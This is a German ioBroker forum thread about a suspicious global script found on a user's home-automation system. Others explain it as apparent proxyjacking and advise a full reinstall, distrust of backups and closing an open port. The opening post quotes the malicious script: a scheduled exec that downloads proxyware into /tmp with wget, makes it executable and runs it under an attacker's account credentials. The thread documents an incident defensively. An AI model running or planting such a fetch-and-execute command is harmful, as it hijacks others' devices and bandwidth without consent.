Skip to content
  • Home
  • Recent
  • Tags
  • 0 Unread 0
  • Categories
  • Unreplied
  • Popular
  • GitHub
  • Docu
  • Hilfe
Skins
  • Light
  • Brite
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Default (No Skin)
  • No Skin
Collapse
ioBroker Logo

Community Forum

donate donate
  1. ioBroker Community Home
  2. Deutsch
  3. Skripten / Logik
  4. [gelöst]Seltsames Script unter Global

NEWS

  • UPDATE 31.10.: Amazon Alexa - ioBroker Skill läuft aus ?
    apollon77A
    apollon77
    48
    3
    8.8k

  • Monatsrückblick – September 2025
    BluefoxB
    Bluefox
    13
    1
    2.2k

  • Neues Video "KI im Smart Home" - ioBroker plus n8n
    BluefoxB
    Bluefox
    16
    1
    3.3k

[gelöst]Seltsames Script unter Global

Scheduled Pinned Locked Moved Skripten / Logik
27 Posts 5 Posters 3.0k Views 4 Watching
  • Oldest to Newest
  • Newest to Oldest
  • Most Votes
Reply
  • Reply as topic
Log in to reply
This topic has been deleted. Only users with topic management privileges can see it.
  • C chemieka

    @crunchip
    Ich nehme an das Script ist schon länger drauf und ist über das Backup wieder drauf gekommen.
    Wie könnte ich prüfen ob die Installation durchgeführt wurde?

    Möchte das nicht ausschließen, dass ich mal einen Port offen hatte in der Vergangenheit aber jetzt auf keinen Fall.

    crunchipC Away
    crunchipC Away
    crunchip
    Forum Testing Most Active
    wrote on last edited by
    #9

    @chemieka ich bin da kein Spezialist für
    da steht bisserl Hintergrund info
    https://netzpalaver.de/2023/04/12/cyberkriminelle-entdecken-proxyjacking-als-neue-einnahmequelle/

    umgestiegen von Proxmox auf Unraid

    C 1 Reply Last reply
    0
    • crunchipC crunchip

      @chemieka ich bin da kein Spezialist für
      da steht bisserl Hintergrund info
      https://netzpalaver.de/2023/04/12/cyberkriminelle-entdecken-proxyjacking-als-neue-einnahmequelle/

      C Offline
      C Offline
      chemieka
      wrote on last edited by
      #10

      @crunchip
      Der Hintergrund ist mir bekannt bzw. schon gelesen.
      Könnte man irgendwie erkennen ob die Installation drauf ist? Seltsam ist auch, die Dateien im Tmp sind vom Anfang Juni. Das System aber zwei Tage alt. Hm.
      Ich glaube ich mache nochmal eine neue Karte fertig und schau mal dann.

      1 Reply Last reply
      0
      • GlasfaserG Glasfaser

        @chemieka sagte in Seltsames Script unter Global:

        device-name=xxxxxxxxxx@io

        was auch komisch ist ...das xxxxxxxxxxxxxxXXXXXXXXXXXXXXX

        Hast du eine DynDNS Service

        EDIT :

        DynDNS von @chemieka unkenntlich gemacht

        GlasfaserG Offline
        GlasfaserG Offline
        Glasfaser
        wrote on last edited by
        #11

        @glasfaser sagte in Seltsames Script unter Global:

        @chemieka sagte in Seltsames Script unter Global:

        device-name=chemieka.ddnss.de@io

        was auch komisch ist ...das ich auch dein Username ...

        Hast du eine DynDNS Service

        Was ist hiermit !?

        Bist du bei der Telekom . Fritzbox . und hast die IP am Ende mit 06 !?

        Synology 918+ 16GB - ioBroker in Docker v9 , VISO auf Trekstor Primebook C13 13,3" , Hikvision Domkameras mit Surveillance Station .. CCU RaspberryMatic in Synology VM .. Zigbee CC2538+CC2592 .. Sonoff .. KNX .. Modbus ..

        C 1 Reply Last reply
        0
        • GlasfaserG Glasfaser

          @glasfaser sagte in Seltsames Script unter Global:

          @chemieka sagte in Seltsames Script unter Global:

          device-name=chemieka.ddnss.de@io

          was auch komisch ist ...das ich auch dein Username ...

          Hast du eine DynDNS Service

          Was ist hiermit !?

          Bist du bei der Telekom . Fritzbox . und hast die IP am Ende mit 06 !?

          C Offline
          C Offline
          chemieka
          wrote on last edited by
          #12

          @glasfaser
          Ja das stimmt schon, werde das mal ändern. Aber ein Port zu IOBroker ist nicht offen.

          GlasfaserG 1 Reply Last reply
          0
          • C chemieka

            @glasfaser
            Ja das stimmt schon, werde das mal ändern. Aber ein Port zu IOBroker ist nicht offen.

            GlasfaserG Offline
            GlasfaserG Offline
            Glasfaser
            wrote on last edited by
            #13

            @chemieka sagte in Seltsames Script unter Global:

            Ja das stimmt schon,

            Die DynDNS ist von dir selber oder die IP mit der 06 !?

            Synology 918+ 16GB - ioBroker in Docker v9 , VISO auf Trekstor Primebook C13 13,3" , Hikvision Domkameras mit Surveillance Station .. CCU RaspberryMatic in Synology VM .. Zigbee CC2538+CC2592 .. Sonoff .. KNX .. Modbus ..

            C 1 Reply Last reply
            0
            • GlasfaserG Glasfaser

              @chemieka sagte in Seltsames Script unter Global:

              Ja das stimmt schon,

              Die DynDNS ist von dir selber oder die IP mit der 06 !?

              C Offline
              C Offline
              chemieka
              wrote on last edited by
              #14

              @glasfaser
              beides.

              GlasfaserG 2 Replies Last reply
              0
              • C chemieka

                @glasfaser
                beides.

                GlasfaserG Offline
                GlasfaserG Offline
                Glasfaser
                wrote on last edited by
                #15

                @chemieka

                Dann sage doch ... du hast auch gerade dazu den Start Thread bearbeitet , mit xxx

                denn ich habe die DynDNS Adresse in meinem Post auch drin !!!
                Werde Ihn dazu editieren !!

                Synology 918+ 16GB - ioBroker in Docker v9 , VISO auf Trekstor Primebook C13 13,3" , Hikvision Domkameras mit Surveillance Station .. CCU RaspberryMatic in Synology VM .. Zigbee CC2538+CC2592 .. Sonoff .. KNX .. Modbus ..

                C 1 Reply Last reply
                0
                • GlasfaserG Glasfaser

                  @chemieka

                  Dann sage doch ... du hast auch gerade dazu den Start Thread bearbeitet , mit xxx

                  denn ich habe die DynDNS Adresse in meinem Post auch drin !!!
                  Werde Ihn dazu editieren !!

                  C Offline
                  C Offline
                  chemieka
                  wrote on last edited by
                  #16

                  @glasfaser
                  Ja bitte. System mal neu Aufsetzen.

                  1 Reply Last reply
                  0
                  • C chemieka

                    Hallo
                    Ich habe hier ein Script unter Global stehen welches ich nicht selber installiert habe.
                    Wenn ich mir das anschauen, denke ich mir da ist was faul.
                    Der Inhalt wäre folgendes:

                    exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
                    schedule("10 6 */2 * *", async function () {
                      exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
                    });
                    

                    Das Script habe ich gestoppt. Denke aber mal das da ein Plugin installiert worden sein könnte. Wie könnte ich das finden und wieder löschen? Was sagt ihr?

                    Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme.Screenshot 2023-06-23 180440.jpg

                    OliverIOO Offline
                    OliverIOO Offline
                    OliverIO
                    wrote on last edited by
                    #17

                    @chemieka
                    so ein system ist nicht mehr vertrauenswürdig.
                    wer weiß was da noch so auf dem system drauf ist oder sich
                    über so eine anwendung mit drauf gepfriemelt hat.

                    eigentlich bleibt nur noch eins,
                    alles platt machen
                    neu aufbauen
                    ob du dem backup noch vertraust musst du selber überlegen
                    ich würde es nicht.

                    Meine Adapter und Widgets
                    TVProgram, SqueezeboxRPC, OpenLiga, RSSFeed, MyTime,, pi-hole2, vis-json-template, skiinfo, vis-mapwidgets, vis-2-widgets-rssfeed
                    Links im Profil

                    C 1 Reply Last reply
                    1
                    • C chemieka

                      @glasfaser
                      beides.

                      GlasfaserG Offline
                      GlasfaserG Offline
                      Glasfaser
                      wrote on last edited by
                      #18

                      @chemieka sagte in Seltsames Script unter Global:

                      @glasfaser
                      beides.

                      Große Frage ... wie kommt Mister X an deine DynDNS ,
                      hast du Sie in ioBroker oder wo anderes auch hinterlegt !?

                      Synology 918+ 16GB - ioBroker in Docker v9 , VISO auf Trekstor Primebook C13 13,3" , Hikvision Domkameras mit Surveillance Station .. CCU RaspberryMatic in Synology VM .. Zigbee CC2538+CC2592 .. Sonoff .. KNX .. Modbus ..

                      OliverIOO 1 Reply Last reply
                      0
                      • OliverIOO OliverIO

                        @chemieka
                        so ein system ist nicht mehr vertrauenswürdig.
                        wer weiß was da noch so auf dem system drauf ist oder sich
                        über so eine anwendung mit drauf gepfriemelt hat.

                        eigentlich bleibt nur noch eins,
                        alles platt machen
                        neu aufbauen
                        ob du dem backup noch vertraust musst du selber überlegen
                        ich würde es nicht.

                        C Offline
                        C Offline
                        chemieka
                        wrote on last edited by
                        #19

                        @oliverio
                        So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.

                        OliverIOO 1 Reply Last reply
                        0
                        • GlasfaserG Glasfaser

                          @chemieka sagte in Seltsames Script unter Global:

                          @glasfaser
                          beides.

                          Große Frage ... wie kommt Mister X an deine DynDNS ,
                          hast du Sie in ioBroker oder wo anderes auch hinterlegt !?

                          OliverIOO Offline
                          OliverIOO Offline
                          OliverIO
                          wrote on last edited by
                          #20

                          @glasfaser

                          wer einmal im netz ist, kann ja theoretisch alle rechner erreichen.
                          wenn auf diesen dann auch eine laxe security existiert, dann ist nix sicher.
                          nas/samba-freigabe ohne passwort?
                          windows ohne passwort?
                          raspberries mit standard login?
                          nas mit standard login?
                          etc.

                          als Ergänzung zu meinem obigen post. theoretisch ist das ganze netz verunreinigt.

                          Meine Adapter und Widgets
                          TVProgram, SqueezeboxRPC, OpenLiga, RSSFeed, MyTime,, pi-hole2, vis-json-template, skiinfo, vis-mapwidgets, vis-2-widgets-rssfeed
                          Links im Profil

                          1 Reply Last reply
                          1
                          • C chemieka

                            @oliverio
                            So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.

                            OliverIOO Offline
                            OliverIOO Offline
                            OliverIO
                            wrote on last edited by OliverIO
                            #21

                            @chemieka sagte in Seltsames Script unter Global:

                            @oliverio
                            So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.

                            und du bist sicher, das sich in deinen anderen skripten nix sonstiges verbirgt?
                            oder in einem der npm module nix eingebaut wurde?
                            dann bitte alles detailliert vorher begutachten, bevor du iobroker wieder startest.
                            derjenige der das gemacht hat, hat detailkenntnisse von iobroker.
                            das ist kein automatisierter angriff, bei denen zu 99% eh alles fehlschlägt, da die systemumgebung nicht passt.

                            Meine Adapter und Widgets
                            TVProgram, SqueezeboxRPC, OpenLiga, RSSFeed, MyTime,, pi-hole2, vis-json-template, skiinfo, vis-mapwidgets, vis-2-widgets-rssfeed
                            Links im Profil

                            C 1 Reply Last reply
                            2
                            • OliverIOO OliverIO

                              @chemieka sagte in Seltsames Script unter Global:

                              @oliverio
                              So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.

                              und du bist sicher, das sich in deinen anderen skripten nix sonstiges verbirgt?
                              oder in einem der npm module nix eingebaut wurde?
                              dann bitte alles detailliert vorher begutachten, bevor du iobroker wieder startest.
                              derjenige der das gemacht hat, hat detailkenntnisse von iobroker.
                              das ist kein automatisierter angriff, bei denen zu 99% eh alles fehlschlägt, da die systemumgebung nicht passt.

                              C Offline
                              C Offline
                              chemieka
                              wrote on last edited by
                              #22

                              @oliverio
                              Ich schaue so genau wie möglich hin. Danke bis hierhin. Gibts ja nicht was alles so möglich ist.

                              GlasfaserG 1 Reply Last reply
                              0
                              • C chemieka

                                @oliverio
                                Ich schaue so genau wie möglich hin. Danke bis hierhin. Gibts ja nicht was alles so möglich ist.

                                GlasfaserG Offline
                                GlasfaserG Offline
                                Glasfaser
                                wrote on last edited by
                                #23

                                @chemieka sagte in Seltsames Script unter Global:

                                Gibts ja nicht was alles so möglich ist.

                                Nur mal nebenbei , schau in deiner Fritte ... warum Port 5555 offen ist !

                                Und ... ändere deine DynDNS !!!!!

                                Synology 918+ 16GB - ioBroker in Docker v9 , VISO auf Trekstor Primebook C13 13,3" , Hikvision Domkameras mit Surveillance Station .. CCU RaspberryMatic in Synology VM .. Zigbee CC2538+CC2592 .. Sonoff .. KNX .. Modbus ..

                                C 1 Reply Last reply
                                0
                                • GlasfaserG Glasfaser

                                  @chemieka sagte in Seltsames Script unter Global:

                                  Gibts ja nicht was alles so möglich ist.

                                  Nur mal nebenbei , schau in deiner Fritte ... warum Port 5555 offen ist !

                                  Und ... ändere deine DynDNS !!!!!

                                  C Offline
                                  C Offline
                                  chemieka
                                  wrote on last edited by
                                  #24

                                  @glasfaser
                                  Mach ich, ich hatte auch schon gescannt. Muss schauen, auf den ersten Blick mir nicht bekannt. Danke.

                                  DJMarc75D 1 Reply Last reply
                                  0
                                  • C chemieka

                                    @glasfaser
                                    Mach ich, ich hatte auch schon gescannt. Muss schauen, auf den ersten Blick mir nicht bekannt. Danke.

                                    DJMarc75D Offline
                                    DJMarc75D Offline
                                    DJMarc75
                                    wrote on last edited by
                                    #25

                                    @chemieka
                                    und was war die Lösung?

                                    Screenshot 2023-06-23 204726.png

                                    Lehrling seit 1975 !!!
                                    Beitrag geholfen ? dann gerne ein upvote rechts unten im Beitrag klicken ;)
                                    https://forum.iobroker.net/topic/51555/hinweise-f%C3%BCr-gute-forenbeitr%C3%A4ge

                                    C 1 Reply Last reply
                                    0
                                    • DJMarc75D DJMarc75

                                      @chemieka
                                      und was war die Lösung?

                                      Screenshot 2023-06-23 204726.png

                                      C Offline
                                      C Offline
                                      chemieka
                                      wrote on last edited by
                                      #26

                                      @djmarc75
                                      Hier macht nur eine neue Installation sinn.

                                      DJMarc75D 1 Reply Last reply
                                      0
                                      • C chemieka

                                        @djmarc75
                                        Hier macht nur eine neue Installation sinn.

                                        DJMarc75D Offline
                                        DJMarc75D Offline
                                        DJMarc75
                                        wrote on last edited by
                                        #27

                                        @chemieka sagte in [gelöst]Seltsames Script unter Global:

                                        Hier macht nur eine neue Installation sinn.

                                        Und wie genau machst Du die ? ;)

                                        Lehrling seit 1975 !!!
                                        Beitrag geholfen ? dann gerne ein upvote rechts unten im Beitrag klicken ;)
                                        https://forum.iobroker.net/topic/51555/hinweise-f%C3%BCr-gute-forenbeitr%C3%A4ge

                                        1 Reply Last reply
                                        0
                                        Reply
                                        • Reply as topic
                                        Log in to reply
                                        • Oldest to Newest
                                        • Newest to Oldest
                                        • Most Votes


                                        Support us

                                        ioBroker
                                        Community Adapters
                                        Donate

                                        869

                                        Online

                                        32.4k

                                        Users

                                        81.5k

                                        Topics

                                        1.3m

                                        Posts
                                        Community
                                        Impressum | Datenschutz-Bestimmungen | Nutzungsbedingungen | Einwilligungseinstellungen
                                        ioBroker Community 2014-2025
                                        logo
                                        • Login

                                        • Don't have an account? Register

                                        • Login or register to search.
                                        • First post
                                          Last post
                                        0
                                        • Home
                                        • Recent
                                        • Tags
                                        • Unread 0
                                        • Categories
                                        • Unreplied
                                        • Popular
                                        • GitHub
                                        • Docu
                                        • Hilfe